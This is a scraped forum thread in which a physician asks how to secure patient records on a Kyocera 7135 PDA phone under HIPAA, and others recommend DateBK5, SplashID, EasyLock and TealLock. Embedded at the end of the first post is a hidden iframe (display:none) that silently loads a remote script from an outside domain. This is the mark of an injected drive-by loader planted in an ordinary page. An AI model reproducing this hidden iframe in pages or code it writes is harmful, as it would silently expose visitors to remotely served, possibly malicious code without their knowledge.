+ Reply to Thread

PDA protection and HIPAA Compliance

I was wondering if there is someone that has the information. I currently have my own medical practice. As of April 14, 2003 the federal government has issued the Health Insurance Portability and Accountability Act. eedless to say I need to protect any sensitive patient information that may reside on my handheld. I have tried the PDASecure program however it renders the phone capibility inoperable. Trust Digital has told me that they will be making a 7135 version. I am wondering if there is anything comparable or better for use on the 7135. Any info would be greatly appreciated.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    Marc Chasin, MD

drugtopics recently had an article about this subject....you may be able to find some help at a site that they reference here:
    http://www.hipaa-pda.com/

the full article is here:
    Drug Topics Article

HIPAA's a PITA.........hope it helps!

PDA protection/HIPAA

Marc-

I have been using DateBK5 to protect the confidential info for my dental patients. My dental office software syncs with my 7135. It allows me to choose what is "private" and what is not. It uses the phones security settings to hide the info. A password is required to show all records.

DateBK5 allows me to designate a catagory (in this case SD Patients) as private. It's as if they never exist. I also use it to hide my office financials and my daily schedule, as well as pt Rx info.

While I suppose that some of the people on this forum would have the "know-how" to hack into this info if they found my phone, it is my understanding that HIPAA only requires you to take reasonable steps to insure privacy.

Hope this helps. If you want to discuss this further, PM me with your phone #.

Brad
    Krazman - "IT MAY BE THAT YOUR PURPOSE IN LIFE IS TO SERVE AS A WARNING TO OTHERS"

I don't know if this will help you but I use a program called Splash ID to securily store client data for my web site business, including financial information, account information, passwords and such as well as a lot of my own personal information such as logins, bank accounts, credit cards. It works great on the 7135.

http://www.splashdata.com/splashid/index.htm
    Taylor Made Web Sites and Domain Services
    Happy Kyocera 7135 User 2003-2008. Now Treo 800w.

I have been looking at the palm site regarding HIPPA, I am looking for the type of security program that woulf allow ther phone to function while creating security. My patient files do not only reside in my datebok as I frequently e-mail my office manager my hospital work.
    Attached Files
    Marc Chasin, MD

Guess I'll have to jump in on this one. Among various titles, I serve as the privacy offer for a large dept in a large health center. The overall answer from the corporate standpoint is that physicians should not be using PDAs for patient information at this point. While there may be some truth to this in terms of true, organized security at the enterprise level, I find this to just be an unacceptable response. There is way too much important software that greatly facilitates the physician's ever increasing responsibilties for patient care. That said, if we do use PDAs in this way, I do believe we have a responsibility to keep information secure. Personally, I use EasyLock. Another good option in TealLock. Both of these apps *will* allow use of the phone to receive calls, even if the pda is locked. And importantly, it locks the entire pda. Some apps have security features built into them, but the plain old "private" feature is probably not enough (IMHO). I use Daynotez and Handbase for some pt info, both of which allow for password protection at the application level. Overall, I believe we're in a transition phase, and a few years from now, security will be much more advanced.